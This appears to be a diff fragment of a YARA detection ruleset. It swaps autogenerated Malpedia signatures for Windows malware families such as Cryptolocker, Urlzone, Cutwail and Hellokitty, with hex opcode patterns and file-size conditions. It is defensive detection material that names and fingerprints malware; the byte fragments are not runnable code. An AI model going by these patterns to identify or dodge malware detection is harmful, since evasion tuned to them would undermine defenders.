-		$sequence_3 = { 0f84002c0000 e9???????? 81bdf0fdffff5261f1ea 0f84b9210000 81bdf0fdffff4769f2ea 0f849d140000 }
-		$sequence_4 = { 81bdf0fdffffd4a90b00 0f846b800000 e9???????? 81bdf0fdffff4daa0b00 0f845e730000 81bdf0fdffff4eaa0b00 }
-		$sequence_5 = { 8d85ace4ffff 50 6a05 68???????? 8b8dc4e4ffff 51 ff15???????? }
-		$sequence_6 = { e9???????? 81bdf0fdffff46e1d405 7776 81bdf0fdffff46e1d405 0f847b490000 81bdf0fdffffc9e0d405 7735 }
-		$sequence_7 = { ebd3 8bc6 c1f805 83e61f 8b048578f64100 c1e606 80643004fd }
-		$sequence_8 = { c7465c907a4100 83660800 33ff 47 897e14 897e70 6a43 }
-		$sequence_9 = { ff15???????? 85c0 7507 33c0 e9???????? 8d55fc }
+		$sequence_0 = { c1e608 0bf5 c1e608 0bf7 8bbc24c0000000 3304bd30a55c00 8bbc24b0000000 }
+		$sequence_1 = { c1e810 0fb6c0 331c8588b65c00 8b442418 c1e808 0fb6c0 331c8588b25c00 }
+		$sequence_2 = { d3e2 8b4df4 0fb60401 0bc2 8b4dec c1f903 8b55f4 }
+		$sequence_3 = { 85c0 7540 ff15???????? 50 68???????? 6a52 68???????? }
+		$sequence_4 = { c60100 41 c60100 0fb6475f 8802 0fb6475e 42 }
+		$sequence_5 = { 8d4d9c e8???????? 68???????? ff750c 68???????? ff7508 68???????? }
+		$sequence_6 = { e8???????? 8b4c241c 8b11 52 e8???????? 8bf0 83c410 }
+		$sequence_7 = { e8???????? 59 59 8365fc00 ff7514 8d459c 50 }
+		$sequence_8 = { c3 5b 5f 5e b801000000 5d 83c408 }
+		$sequence_9 = { 8bf0 85f6 7511 6829010000 68???????? 6a41 e9???????? }
 
 	condition:
-		7 of them and filesize < 297984
+		7 of them and filesize < 7086080
 }
-rule MALPEDIA_Win_Unidentified_095_Auto : FILE
+rule MALPEDIA_Win_Mqsttang_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2cdecaec-fb60-5714-949a-43017e2a9367"
+		id = "5c891dae-4eed-590b-b193-46c6fc31d649"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_095"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_095_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mqsttang"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mqsttang_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "26f94ce2105de641743f6ff5fce894a28fc2893a963b3d77519d919e034fdf59"
+		logic_hash = "730db72c4ecde718fd98b702027c89d493008b2e112f78653e06311a808dd020"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116954,34 +117294,34 @@ rule MALPEDIA_Win_Unidentified_095_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 448be0 e8???????? 85c0 0f84e3000000 4883cfff 488bdf 48ffc3 }
-		$sequence_1 = { eb04 1bc0 8903 bf01000000 ff15???????? 4c8b742438 85ed }
-		$sequence_2 = { 4533db 498bd3 4c8d05b34dffff 4b8b8ce0a0450200 4803ca 48ffc2 46885cf13e }
-		$sequence_3 = { 41ffd6 be01000000 488bcf ff15???????? 4c8b742430 }
-		$sequence_4 = { 418be9 48c1f806 488d0da88e0100 4183e23f 4903e8 498bf0 }
-		$sequence_5 = { 4881c490000000 5d c3 4053 4883ec20 488bd9 }
-		$sequence_6 = { 488d0dc2f30100 e8???????? 488b442428 488905???????? 488d442428 4883c008 488905???????? }
-		$sequence_7 = { 4883ec40 48897c2460 33ed 4c89642470 4d8be1 4c896c2478 4d8be8 }
-		$sequence_8 = { 894c2428 488d156a4f0100 4889442420 e8???????? e9???????? 89758f e9???????? }
-		$sequence_9 = { 48894c2428 4885f6 0f848b000000 4533c0 488bd6 488bcb e8???????? }
+		$sequence_0 = { ffd0 ebd0 c744241c02000000 c744242000000000 c744242400000000 c744242800000000 c744242cb47e7b00 }
+		$sequence_1 = { e8???????? 8b4da8 e8???????? 8b4dac e8???????? 891c24 e8???????? }
+		$sequence_2 = { e8???????? 8b85d0bfffff 8b00 3b5804 7ed8 8b85f0bfffff 3b85c0bfffff }
+		$sequence_3 = { f20f106dd0 f20f1055d8 f20f115d90 f20f116588 f20f116d80 f20f119578ffffff b808000000 }
+		$sequence_4 = { e8???????? 8b4340 8b4004 85c0 7507 8b4354 85c0 }
+		$sequence_5 = { e8???????? 85c0 0f844cffffff c705????????20339000 c705????????ffffffff c70424???????? e8???????? }
+		$sequence_6 = { e9???????? 8b06 ba20000000 8b9ecc000000 8945c0 8b45c4 668b4002 }
+		$sequence_7 = { f7e7 8d04b6 01c1 c1ea02 01ca 8b0493 5b }
+		$sequence_8 = { eb96 89c6 8d5db4 eb97 89c6 8d5db4 eb98 }
+		$sequence_9 = { e8???????? 891c24 89c1 a3???????? e8???????? 83ec04 83c418 }
 
 	condition:
-		7 of them and filesize < 339968
+		7 of them and filesize < 12651520
 }
-rule MALPEDIA_Win_Redsalt_Auto : FILE
+rule MALPEDIA_Win_Miniasp_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5db28da0-c495-5a5e-81dd-226433bd91b1"
+		id = "f347c9b8-8bc2-5051-8759-9c4a71c6ee76"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redsalt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redsalt_auto.yar#L1-L223"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.miniasp_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "5cb648a823e719ff50550ad2518a39d179f56511a84a79bfd6218be12b96b8b0"
+		logic_hash = "dc054826603e4c65732efe9c4e870d0e5d57b1e034ff76fb6ca9b268c587f33f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -116993,47 +117333,32 @@ rule MALPEDIA_Win_Redsalt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c414 33c9 83f8ff 0f95c1 }
-		$sequence_1 = { 750b 68e8030000 ff15???????? e8???????? }
-		$sequence_2 = { c745d060ea0000 6a04 8d45d0 50 6806100000 68ffff0000 }
-		$sequence_3 = { e8???????? 85c0 750a 6a32 }
-		$sequence_4 = { 51 ffd6 85c0 7510 }
-		$sequence_5 = { 85c0 7515 c705????????01000000 ff15???????? e9???????? }
-		$sequence_6 = { 740d 68???????? e8???????? 83c404 833d????????02 }
-		$sequence_7 = { 83c9ff 85f6 7c0e 83fe7f }
-		$sequence_8 = { 7509 80780120 7503 83c002 }
-		$sequence_9 = { 6a00 52 c744242401000000 8944242c }
-		$sequence_10 = { 8d8530fcffff 50 e8???????? 83c40c }
-		$sequence_11 = { c60100 5f 5e 33c0 }
-		$sequence_12 = { 83c40c eb02 33c0 8b4df4 }
-		$sequence_13 = { e8???????? 83c408 6800010000 68???????? }
-		$sequence_14 = { 833800 750f c705????????01000000 e9???????? }
-		$sequence_15 = { f7e7 8bea d1ed 33c0 }
-		$sequence_16 = { d1ed 33c0 83ef03 8a06 83c603 c1e802 41 }
-		$sequence_17 = { eb03 83caff 8b442410 c0e106 0aca 884d00 45 }
-		$sequence_18 = { c644243423 c644243572 c64424367a c644243700 }
-		$sequence_19 = { c8201cdd f7be5b408d58 1b7f01 d2cc }
-		$sequence_20 = { d2cc bbe3b46b7e 6aa2 dd45ff }
-		$sequence_21 = { e8???????? 89442430 48c744244000000000 8b442430 }
-		$sequence_22 = { e8???????? 89442428 e9???????? bf2d000000 488d542420 4d8bc5 }
-		$sequence_23 = { e8???????? 8944242c 8b4c2428 8b44242c }
-		$sequence_24 = { e8???????? 89442428 e9???????? 8b4c2420 8b442428 01c8 }
+		$sequence_0 = { 83a5e8fbffff00 83a5f4fbffff00 8b85bcfbffff 83b81404000000 740f 8b85bcfbffff 83b814040000ff }
+		$sequence_1 = { c645fb00 8b45ec ffb098000000 6a00 8b45ec ffb0a4000000 8b45ec }
+		$sequence_2 = { 48 8985fcddffff 8b85fcddffff 8a4001 8885fbddffff ff85fcddffff 80bdfbddffff00 }
+		$sequence_3 = { be???????? f3a5 a4 8b45bc 8b8098000000 48 8945a8 }
+		$sequence_4 = { 2b856cffffff 898564ffffff 7507 32c0 e9???????? ff7510 ff750c }
+		$sequence_5 = { 83ec18 894de8 6800c80000 e8???????? 59 8945fc }
+		$sequence_6 = { ff7508 6a00 ff15???????? 85c0 7505 }
+		$sequence_7 = { f3a4 8b4508 898550deffff 8b8550deffff 89854cdeffff 8b8550deffff 8a00 }
+		$sequence_8 = { 68???????? 64a100000000 50 51 51 83ec34 53 }
+		$sequence_9 = { 6804010000 e8???????? 59 8945d4 8b45d4 8945ec }
 
 	condition:
-		7 of them and filesize < 2957312
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Zardoor_Auto : FILE
+rule MALPEDIA_Win_Makloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0edcabb6-39f3-5cd6-ada5-74eb513ae7ba"
+		id = "0f3149c9-1ed5-5172-a5f9-8fb09f83bab4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zardoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zardoor_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.makloader_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "dcbde80565a6988222a931ad27e9d322a3f8d97571d82cdb176504031bc2daa5"
+		logic_hash = "d48950dd774d94fc31c8ea99b96c15449f45f0477bbb34828e1e9167b3ed582c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117047,32 +117372,32 @@ rule MALPEDIA_Win_Zardoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 41b85a010000 488d1532a01000 488bcb e8???????? 83c8ff 488b5c2450 }
-		$sequence_1 = { e8???????? b801000000 eb34 c744242013010000 41b87e000000 eb0e c74424200b010000 }
-		$sequence_2 = { e8???????? 41b882000000 488d1520da0900 498bcd e8???????? 488b4308 4885c0 }
-		$sequence_3 = { eb38 488b97a0060000 eb28 488d0d9d3f1300 ba02000000 33c0 eb1f }
-		$sequence_4 = { e8???????? e9???????? ba2f000000 c74424285f020000 488d1d81f11200 41b8b3010000 488bcf }
-		$sequence_5 = { e8???????? 488bd8 4885c0 7417 488bcf e8???????? 488bfb }
-		$sequence_6 = { e8???????? 41b88b010000 488d1574a60f00 498bcf e8???????? 488b4c2458 488d1578faffff }
-		$sequence_7 = { ffc6 4883c302 eb95 488b9c2490000000 488bcb e8???????? 4803f8 }
-		$sequence_8 = { e8???????? 83c8ff e9???????? 448b8c24a0000000 4183f901 7468 4c8d0522000b00 }
-		$sequence_9 = { 488d4904 488d14c8 488b83a8000000 488990e0020000 488b83a8000000 488b8b88040000 488b80e0020000 }
+		$sequence_0 = { 8945fc 837dfc0a 7332 8b4dfc 51 8b4df8 }
+		$sequence_1 = { 8b4dfc 034820 894de8 8b55f4 }
+		$sequence_2 = { 8d8d6cfeffff 83c1ff 898d24e6ffff 8b9524e6ffff 8a4201 888561e6ffff 838524e6ffff01 }
+		$sequence_3 = { 52 8b4dfc e8???????? 8b4dfc 884135 ba01000000 6bc235 }
+		$sequence_4 = { e8???????? 83c404 ba01000000 6bca03 8b5508 0fbe0c0a 33c1 }
+		$sequence_5 = { 8a956be6ffff 8811 8b85d4e5ffff 83c001 8985d4e5ffff 8b8d08e6ffff 83c101 }
+		$sequence_6 = { 6bc21c 8b4d08 0fb61401 52 8b4dfc }
+		$sequence_7 = { 6bd105 8b4c05bc 894c15bc 8b4405c0 894415c0 b908000000 }
+		$sequence_8 = { c705????????f8504200 b001 c3 68???????? e8???????? c70424???????? }
+		$sequence_9 = { 8b4dfc 884114 ba01000000 6bc214 }
 
 	condition:
-		7 of them and filesize < 4376576
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Glitch_Pos_Auto : FILE
+rule MALPEDIA_Win_Webc2_Rave_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "167489a1-806c-57ac-870b-1a5711737bf5"
+		id = "df6c143a-04c8-53dd-b585-7785e6f7c9b7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.glitch_pos_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_rave_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "8974caf746bb63b369da7b75c4e0e1a2b35b653a94e981b459531b393a112a37"
+		logic_hash = "d35d8eb6aefe7cc5c299f90e5678dfb9d7a049e0361b4bce0487fde286aa34fe"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117086,32 +117411,32 @@ rule MALPEDIA_Win_Glitch_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45a0 50 6a03 e8???????? 83c410 8b4508 8b00 }
-		$sequence_1 = { 668985f0feffff 8d4598 50 8d45a8 50 6a02 }
-		$sequence_2 = { 8b45d0 8b00 ff75d0 ff5040 dbe2 8945cc 837dcc00 }
-		$sequence_3 = { 662d0100 0f80b0010000 6689459c 8d459c 50 }
-		$sequence_4 = { 837de000 7d1a 6894000000 68???????? ff75e4 ff75e0 e8???????? }
-		$sequence_5 = { eb07 83a5fcfdffff00 8d45c4 50 8d45cc 50 6a02 }
-		$sequence_6 = { 8b00 ffb520ffffff ff5014 dbe2 89851cffffff }
-		$sequence_7 = { c78524ffffff08000000 c7853cffffff3c364600 c78534ffffff08000000 8d45a8 }
-		$sequence_8 = { 68a4020000 68???????? ff7508 ffb5d0feffff e8???????? 898550feffff eb07 }
-		$sequence_9 = { ff75d8 e8???????? dc9d68ffffff dfe0 }
+		$sequence_0 = { 6aff 8d542438 53 52 6a02 894c2444 }
+		$sequence_1 = { ff15???????? 8b442418 5f 5e 5d 81c420030000 c3 }
+		$sequence_2 = { 8b4e04 51 ffd7 8b4608 3bc3 7409 50 }
+		$sequence_3 = { 83ec68 8d442410 50 e8???????? }
+		$sequence_4 = { 8b442414 c6043000 85db 7409 53 e8???????? 83c404 }
+		$sequence_5 = { 8bf8 83ffff 740d 8b4c2410 6a00 51 56 }
+		$sequence_6 = { 750c 68d0070000 45 ff15???????? 83fd0a 7419 }
+		$sequence_7 = { 57 b941000000 33c0 8d7c2420 f3ab aa }
+		$sequence_8 = { 8d8c2454010000 68???????? 51 ffd6 897c2418 8d94245c020000 8d842454010000 }
+		$sequence_9 = { 50 ffd5 83c408 e9???????? 8b4e10 6aff 8d542438 }
 
 	condition:
-		7 of them and filesize < 1024000
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Gazer_Auto : FILE
+rule MALPEDIA_Win_Hlux_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c74a4922-e38b-5cfc-86b0-8679816aca6f"
+		id = "d5f33612-2e58-5a58-b025-51b8c84d8ab0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gazer_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hlux_auto.yar#L1-L159"
 		license_url = "N/A"
-		logic_hash = "168f0b268a65ddb10248870588fd54b58308fd12a6c3f9d75de33b31a206d1b2"
+		logic_hash = "6289602931f864ef390f887bdc3596feba8613d121e8e169b915693bee14e183"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117125,32 +117450,38 @@ rule MALPEDIA_Win_Gazer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7511 e8???????? 84c0 7508 }
-		$sequence_1 = { ff15???????? 85c0 7511 e8???????? 84c0 7508 }
-		$sequence_2 = { ff15???????? 85c0 7511 e8???????? 84c0 }
-		$sequence_3 = { ff15???????? 85c0 7511 e8???????? 84c0 7508 83c8ff }
-		$sequence_4 = { 7511 e8???????? 84c0 7508 83c8ff }
-		$sequence_5 = { 85c0 7511 e8???????? 84c0 }
-		$sequence_6 = { 7511 e8???????? 84c0 7508 83c8ff e9???????? }
-		$sequence_7 = { 85c0 7511 e8???????? 84c0 7508 83c8ff }
-		$sequence_8 = { 85c0 7511 e8???????? 84c0 7508 83c8ff e9???????? }
-		$sequence_9 = { 0fb6420e 894c2408 0fb64a0f c1e108 0bc8 0fb6420d c1e108 }
+		$sequence_0 = { 0009 1b4e01 e405 9d }
+		$sequence_1 = { 0101 c9 c3 6a10 }
+		$sequence_2 = { 0104bb 8d1447 89542418 e9???????? }
+		$sequence_3 = { 8b8d84feffff 898d84feffff 8b0d???????? 8b1d???????? 899d0cffffff 898d64ffffff }
+		$sequence_4 = { 0000 008365f0fe8b 4d 0883c108e918 }
+		$sequence_5 = { 0130 8b13 8b08 85d2 }
+		$sequence_6 = { 8975fc 57 33d2 81fac4f4b942 741d 8d7a6f }
+		$sequence_7 = { 53 bb36194608 895dcc 56 33d2 33f6 }
+		$sequence_8 = { 010f 840f 0000 008365f0fe8b }
+		$sequence_9 = { 895584 bb2672b397 83fbab 7406 899d44ffffff 09c9 7506 }
+		$sequence_10 = { 8985f0feffff 33d2 33f6 81fe61979899 7428 81faa5601b7b }
+		$sequence_11 = { bf81b805ef 81f876496748 744d 8b15???????? }
+		$sequence_12 = { 21f6 7427 83f8af 7422 }
+		$sequence_13 = { 0088aa4b0023 d18a0688078a 46 018847018a46 }
+		$sequence_14 = { 7506 89b588feffff 83f922 0f8501010000 8b05???????? 897dc8 }
+		$sequence_15 = { 0104b9 33c9 83c408 85c0 }
 
 	condition:
-		7 of them and filesize < 950272
+		7 of them and filesize < 3147776
 }
-rule MALPEDIA_Win_Hellokitty_Auto : FILE
+rule MALPEDIA_Win_Urlzone_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "85d82fef-e1ef-5538-a8ca-f2e16ab22789"
+		id = "66cd5cda-0cf5-5934-9baf-6b5f820d2f06"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hellokitty_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.urlzone_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "fc4ce366fe91b18117b1ec99ae5affdf6560b9a7558856d80c31c8511e65fec9"
+		logic_hash = "7c1a2ac73460b5e428df7b91964316f5979631407a0a74f2db057df15dd1651b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117164,32 +117495,32 @@ rule MALPEDIA_Win_Hellokitty_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45c8 0bf1 3345dc 33de 2345d0 33fa 3345c8 }
-		$sequence_1 = { 66d3e0 0fb7c0 0bf0 8875fe 84f6 0f856effffff }
-		$sequence_2 = { 8bcb c1c90b 33c8 8975c4 8bc3 89b560ffffff }
-		$sequence_3 = { 03f3 8b5df4 33d0 8bc1 03de c1c802 33d0 }
-		$sequence_4 = { c1c802 33d0 8b75b8 8bc1 03da c1c807 8bd1 }
-		$sequence_5 = { 894df8 894de0 8955f4 0fb688303b4200 8b45e8 c1e818 0fb680303b4200 }
-		$sequence_6 = { 50 56 8d4dd8 e8???????? 8b5de0 8b75dc }
-		$sequence_7 = { 8988a4000000 0fb6c9 0fb699303b4200 0fb688a7000000 c1e308 0fb689303b4200 33d9 }
-		$sequence_8 = { ffd3 68???????? 8945e4 ffd3 8b55f8 8d75f0 56 }
-		$sequence_9 = { 33d2 6689544802 eb11 6a28 c645fc00 ff75fc }
+		$sequence_0 = { 7503 8a0a 42 80e930 80f909 7708 }
+		$sequence_1 = { 7c42 80f866 7f3d 80ec61 }
+		$sequence_2 = { 7f08 80ec41 80c40a eb10 }
+		$sequence_3 = { 80fc39 7f05 80ec30 eb22 }
+		$sequence_4 = { 80e830 eb22 80f841 7c23 80f846 7f08 }
+		$sequence_5 = { 7f08 80ec41 80c40a eb10 80fc61 7c42 }
+		$sequence_6 = { eb10 80f861 7c11 80f866 7f0c }
+		$sequence_7 = { 80e930 80f909 7708 8d0480 8d0441 ebed }
+		$sequence_8 = { 80ec61 80c40a 80f830 7c32 80f839 7f05 }
+		$sequence_9 = { 7c63 80fc39 7f05 80ec30 eb22 80fc41 7c54 }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 704512
 }
-rule MALPEDIA_Win_Cutwail_Auto : FILE
+rule MALPEDIA_Win_Hardrain_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "74edd1da-0a31-5dc7-9e3f-137bbcc67ffb"
+		id = "1a6618b8-7c70-57f8-b6a6-f8de7a4fa76c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cutwail_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hardrain_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "19ab3f1dd76c95a9fd39a987b454b861d51946958edf6894a04ce0a4e884e4fd"
+		logic_hash = "04e06a92a16a529e591abeaa4beba2487be2e1ac947f5b4db02fe0ee80e8f06b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117203,38 +117534,32 @@ rule MALPEDIA_Win_Cutwail_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33d2 f775e8 8b45ec 6a05 }
-		$sequence_1 = { 8b8d64feffff 038d4cfeffff 8b9544feffff 8b048d30f62004 8902 8b8d44feffff 8b9548feffff }
-		$sequence_2 = { 7434 39750c 762f 2bdf }
-		$sequence_3 = { 837d0c00 7406 837d1000 7d04 32c0 eb57 c745fc00000000 }
-		$sequence_4 = { ff7524 8b7530 8d457c 50 }
-		$sequence_5 = { 83c404 8985e4fdffff 6a07 e8???????? 83c404 }
-		$sequence_6 = { 7d07 c68563feffff01 0fb69563feffff 83fa01 }
-		$sequence_7 = { ff15???????? 8b4dfc c7410400000000 6830750000 ff15???????? 8b55fc }
-		$sequence_8 = { 0f84ab020000 8b4564 ff30 8b4d4c }
-		$sequence_9 = { 83c40c 6810270000 ff15???????? 33c0 }
-		$sequence_10 = { 7d6e ff15???????? 89855cfeffff 8b8d5cfeffff 3b8d68feffff }
-		$sequence_11 = { 85c0 8945ec 7425 803b34 }
-		$sequence_12 = { e8???????? 8945f8 837df8ff 7504 32c0 eb27 }
-		$sequence_13 = { 8b8d5cfeffff 3b8d68feffff 730e 8b955cfeffff 899568feffff eb46 8b8568feffff }
-		$sequence_14 = { ff75f8 8d8554feffff 56 50 }
-		$sequence_15 = { 03fb 8b5df0 83c40c ff4df4 }
+		$sequence_0 = { 33f6 57 85db 8bf9 763f 8b6c2414 68b4000000 }
+		$sequence_1 = { 8bf1 7431 803802 752c 8a4826 83c026 80f920 }
+		$sequence_2 = { 0f85a4000000 50 50 50 56 ff15???????? }
+		$sequence_3 = { 743a 6a16 8d4c241c 55 }
+		$sequence_4 = { 50 6a00 6a00 51 53 89742430 c744242c01000000 }
+		$sequence_5 = { 6a0c 52 56 89442418 894c2414 }
+		$sequence_6 = { 68???????? 56 e8???????? 83c414 85c0 75de 68b4000000 }
+		$sequence_7 = { 6aff 51 ff15???????? 33c0 81c4540c0000 }
+		$sequence_8 = { 5d b801000000 5b 59 c20400 8b4c2410 895910 }
+		$sequence_9 = { ff15???????? 8bf0 83feff 0f8493000000 8d442408 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Stowaway_Auto : FILE
+rule MALPEDIA_Win_Cryptolocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6f8ce329-6af5-534d-8e65-b76b0e9206b8"
+		id = "ad9b18af-235b-525a-af62-054a0222583c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stowaway_auto.yar#L1-L182"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptolocker_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "3f7831026b9a760683489b7cb3923fc1a6ee7aeca5e5576ea427cb584360b368"
+		logic_hash = "75564b552b8c35eb8b1fab229d91abfa4288be2b05e1664b616963e88f02714a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117248,41 +117573,32 @@ rule MALPEDIA_Win_Stowaway_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a7cbe46 a3???????? 4e fb }
-		$sequence_1 = { 4e fb b501 2a37 }
-		$sequence_2 = { f67be8 7ce8 7de8 7ee8 }
-		$sequence_3 = { 76e8 77e8 78e8 79e8 }
-		$sequence_4 = { 78e8 79e8 7ae8 ce f67be8 7ce8 }
-		$sequence_5 = { 182e 087c1013 181c04 a6 }
-		$sequence_6 = { 3f 68fe260c00 5a 3cc3 }
-		$sequence_7 = { 7277 d7 c9 2127 }
-		$sequence_8 = { 322c0d01123df8 16 e0ff 2e1c43 1c56 186111 040f }
-		$sequence_9 = { 89f9 57 48 f2ae 55 ff9630a03b00 09c0 }
-		$sequence_10 = { 66790d 93 265e 27 }
-		$sequence_11 = { b423 53 e774 5b 004f49 5c 7221 }
-		$sequence_12 = { 40 3b740282 f4 d6 2a09 }
-		$sequence_13 = { 0c3f 090448 b8f58621b0 0448 }
-		$sequence_14 = { 58 c8737282 fc fc 91 }
-		$sequence_15 = { e6a0 2ea4 0e 0cef 30e5 46 }
-		$sequence_16 = { 56 a8b4 c8a03b0a a1???????? }
-		$sequence_17 = { 52 1d1af29c20 3ca4 5b }
-		$sequence_18 = { 7783 7786 7787 7788 }
+		$sequence_0 = { f605????????01 753b 68???????? ff15???????? }
+		$sequence_1 = { 8b45e8 8901 8b45ec 894104 8b45f0 8906 8b45f4 }
+		$sequence_2 = { 5b 8be5 5d c3 c745fc00000000 8bc6 8945e4 }
+		$sequence_3 = { e8???????? 85c0 0f85e0000000 8b4514 c70000000000 81ff11010000 }
+		$sequence_4 = { 33c0 5b 8be5 5d c21800 ff7514 56 }
+		$sequence_5 = { 2bc7 99 2bc2 8bd8 8b4508 d1fb 8b5004 }
+		$sequence_6 = { c20400 8d85acfdffff 50 8d85a4fbffff 50 ff15???????? 894508 }
+		$sequence_7 = { 6a02 ff15???????? 83f801 770c }
+		$sequence_8 = { ff15???????? 85c0 7480 8b75ec }
+		$sequence_9 = { 85c0 7509 83c640 3b37 72d5 }
 
 	condition:
-		7 of them and filesize < 8003584
+		7 of them and filesize < 778240
 }
-rule MALPEDIA_Win_Starsypound_Auto : FILE
+rule MALPEDIA_Win_Navrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
